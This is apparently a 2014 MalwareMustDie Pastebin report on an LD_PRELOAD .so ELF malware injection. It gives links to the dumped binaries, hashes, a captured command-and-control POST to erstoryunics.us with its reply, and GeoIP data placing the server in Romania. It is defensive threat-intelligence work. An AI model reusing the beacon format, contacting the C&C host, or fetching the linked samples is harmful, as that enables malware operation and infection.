SHARE
TWEET

LD_PRELOAD .SO ELF MALWARE ATTACK FROM ROMANIA

MalwareMustDie Jun 10th, 2014 324 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. #MalwareMustDie Report of .SO ELF Malware attack
  2. #date: Wed Jun 11 06:38:13 JST 2014
  3.  by @unixfreaxjp
  4. # to: yin
  5.  
  6. // Reported Injected installation .SO Bins
  7. http://gist.githubusercontent.com/anonymous/b8e64d8c0ed021361934/raw/b3cead071dbb104a6e6623e1235ef7398c4949c9/gistfile1.txt
  8. http://gist.github.com/anonymous/ed69b3e5ed1ee6a1365a
  9.  
  10.  
  11. // Additional reports.. attacker list & CNC call trapped by IDS..
  12. http://gist.github.com/anonymous/9c3de834f09931588897
  13. http://gist.github.com/anonymous/a8556208eb787168f35f
  14. http://gist.github.com/anonymous/38c59ec3ccc4329d12ce
  15.  
  16. // extract the bins w/ template:
  17. $ date
  18. Wed Jun 11 04:12:11 JST 2014
  19. $
  20. $ php ./sodump-template.php
  21. SO x32 dumped 26848
  22. SO x64 dumped 27288
  23. MO x32 dumped 26848
  24. MO x64 dumped 27288
  25. $
  26. $ ls -alF
  27. total 600
  28. drwxrwxrwx   2 xxx xxx    512 Jun 11 04:12 ./
  29. drwxrwxrwx  13 xxx xxx    512 Jun 11 03:59 ../
  30. -rw-r--r--   1 xxx xxx  26848 Jun 11 04:12 libworker1-32.so
  31. -rw-r--r--   1 xxx xxx  27288 Jun 11 04:12 libworker1-64.so
  32. -rw-r--r--   1 xxx xxx  26848 Jun 11 04:12 libworker2-32.so
  33. -rw-r--r--   1 xxx xxx  27288 Jun 11 04:12 libworker2-64.so
  34.  
  35. $ md5 lib*
  36. MD5 (libworker1-32.so) = 15584bc865d01b7adb7785f27ac60233
  37. MD5 (libworker1-64.so) = f9aeda08db9fa8c1877e05fe0fd8ed21
  38. MD5 (libworker2-32.so) = 15584bc865d01b7adb7785f27ac60233
  39. MD5 (libworker2-64.so) = f9aeda08db9fa8c1877e05fe0fd8ed21
  40.  
  41.  
  42. $ file lib*
  43. libworker1-32.so: ELF 32-bit LSB shared object, Intel 80386, version 1 (SYSV), dynamically linked, stripped
  44. libworker1-64.so: ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, stripped
  45. libworker2-32.so: ELF 32-bit LSB shared object, Intel 80386, version 1 (SYSV), dynamically linked, stripped
  46. libworker2-64.so: ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, stripped
  47. $
  48.  
  49. // CNC:
  50.  
  51. POST /kuku/theend.php HTTP/1.0
  52. Host: erstoryunics.us
  53. Pragma: 1337
  54. Content-Length: 84
  55.  
  56. R,20130826,64,0,,UNIX SCO System - MalwareMustDie Bangs Moronz CNC,
  57. HTTP/1.1 200 OK
  58. Date: Tue, 10 Jun 2014 22:12:22 GMT
  59. Server: Apache/2.2.15 (CentOS)
  60. X-Powered-By: PHP/5.3.3
  61. Content-Length: 6
  62. Connection: close
  63. Content-Type: text/html; charset=UTF-8
  64. R,200
  65.  
  66. // CNC INFO (NETWORK & GEOIP)
  67.  
  68. $ echo `dig +short erstoryunics.us`|bash origin.sh
  69. Wed Jun 11 06:28:03 JST 2014|89.45.14.64||39743 | 89.45.14.0/24 | VOXILITY | MD | - | IM INTERNET MEDIA SRL
  70. IP Address, City, Country Name, Latitude, longitude, Time Zone
  71. 89.45.14.64, , Romania, 46.0, 25.0, Europe/Bucharest
  72.  
  73. ---
  74. #MalwareMustDie!!
RAW Paste Data
Top